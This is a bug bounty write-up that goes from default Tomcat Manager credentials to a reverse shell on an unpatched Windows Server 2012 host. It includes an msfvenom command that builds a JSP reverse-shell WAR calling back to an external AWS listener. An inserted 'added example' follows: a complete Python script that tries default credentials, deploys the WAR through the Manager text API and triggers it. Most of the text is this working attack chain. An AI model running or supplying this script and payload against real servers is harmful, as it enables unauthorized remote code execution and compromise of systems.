From TOMCAT to NT AUTHORITY\SYSTEM

So it's been some time since I've done any bug bounty work, as I was busy working.

I won't be revealing the program due to privacy issues.

I started my initial recon by doing some subdomain enumeration using Knockpy, Sublist3r, etc.

And I got a subdomain named test.REDACTED.com. There was nothing much to look at; it returned a simple static HTML page. Then I did a directory scan using Dirsearch.

“/manager”: that's a Tomcat Manager login.

Checking if it used the default login was much more satisfying.

Please don't question my PC name.

And drum roll…

We have a LOGIN!

Oooh Weee

Now it's time to pop a shell. I used my AWS server as the listener.

Generating a JSP reverse-shell payload packaged as a WAR can be achieved using this command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=18.191.1**.* LPORT=4444 -f war > shell.war

**On AWS you can open whichever listener port you choose by adding it to the instance's security group inbound rules.**

Now set up the TCP handler for the port used above.
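As an added example (not the author's code or tooling), the following Python script automates the two steps above: checking the Manager for default credentials, then deploying the msfvenom WAR through the Manager's text API and requesting the new context so the JSP connects back to the handler. The target URL, the credential list and the /shell context path are assumptions; the script reads the shell.war produced by the msfvenom command. One caveat worth knowing: the text API (/manager/text/) needs the manager-script role, and on Tomcat 7 a user who only has manager-gui is refused there, while the HTML manager's own deploy form is protected by a CSRF nonce, which is why the text API is the scriptable route.

```python
"""Tomcat Manager default-credential check + WAR deployment.

Added example for this write-up, not the author's own tooling. The HTTP
transport is a parameter so the logic can be exercised against a fake
server; by default it uses urllib, so only the standard library is needed.
"""
import base64
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# Constructed list of credentials commonly left in tomcat-users.xml by
# installers and tutorials (an assumption; extend it to taste).
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("admin", ""),
    ("manager", "manager"),
    ("role1", "tomcat"),
]


def basic_auth_header(user, password):
    """Manager uses HTTP Basic auth: base64("user:password")."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def urllib_send(method, url, headers, body=None, timeout=10):
    """Default transport. Returns (status, body_text); status is None when
    the request fails or times out before any response arrives."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # 401 / 403 / 404 still carry a body
        return err.code, err.read().decode(errors="replace")
    except OSError as err:  # connection refused, DNS failure, read timeout
        return None, str(err)


def check_default_creds(base_url, creds=DEFAULT_CREDS, send=urllib_send):
    """Try each pair against /manager/html. Returns the first accepted pair
    or None. 401 means rejected; 403 means the password is right but the
    account lacks manager-gui, which is still a finding worth recording."""
    url = base_url.rstrip("/") + "/manager/html"
    for user, password in creds:
        status, _ = send("GET", url, basic_auth_header(user, password))
        if status == 200:
            return user, password
        if status == 403:
            print(f"[!] {user}:{password} authenticates but lacks manager-gui")
    return None


def deploy_war(base_url, user, password, context_path, war_bytes, send=urllib_send):
    """Deploy through the text API (PUT /manager/text/deploy), which needs
    the manager-script role. Tomcat answers HTTP 200 with a body starting
    'OK - Deployed application at context path ...' on success and
    'FAIL - ...' otherwise, so the body, not the status code, decides."""
    url = (base_url.rstrip("/") + "/manager/text/deploy?path="
           + quote(context_path) + "&update=true")
    headers = basic_auth_header(user, password)
    headers["Content-Type"] = "application/octet-stream"
    status, body = send("PUT", url, headers, body=war_bytes)
    return status == 200 and body.startswith("OK")


def trigger(base_url, context_path, send=urllib_send):
    """Request the deployed context. msfvenom's WAR wrapper maps its JSP to
    url-pattern /*, so a GET on the context root runs it. The JSP blocks for
    as long as the reverse shell lives, so a timeout (status None) is the
    expected sign that the payload fired; look at the handler."""
    status, _ = send("GET", base_url.rstrip("/") + context_path + "/", {}, timeout=5)
    return status


if __name__ == "__main__":
    # usage: python tomcat_mgr.py http://test.REDACTED.com:8080 shell.war
    target, war_file = sys.argv[1], sys.argv[2]
    creds = check_default_creds(target)
    if creds is None:
        sys.exit("[-] no default credentials accepted")
    print(f"[+] manager login {creds[0]}:{creds[1]}")
    with open(war_file, "rb") as fh:
        war = fh.read()
    if not deploy_war(target, creds[0], creds[1], "/shell", war):
        sys.exit("[-] deploy failed (text API needs the manager-script role)")
    print("[+] deployed, triggering")
    print(f"[*] trigger returned status {trigger(target, '/shell')}")
```

Run it with the handler already listening; a 403 from /manager/html with a working password is worth noting separately, since the same account may still be accepted by the text API if it carries manager-script.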

The server is running Apache Tomcat 7.0.

On further enumeration I found that the server was Microsoft Windows Server 2012, which was not looked after very often; the last patch was from 2016 (poor guy).

And it was vulnerable to MS16-032, but I never tried to exploit it because it might piss off some of the devs.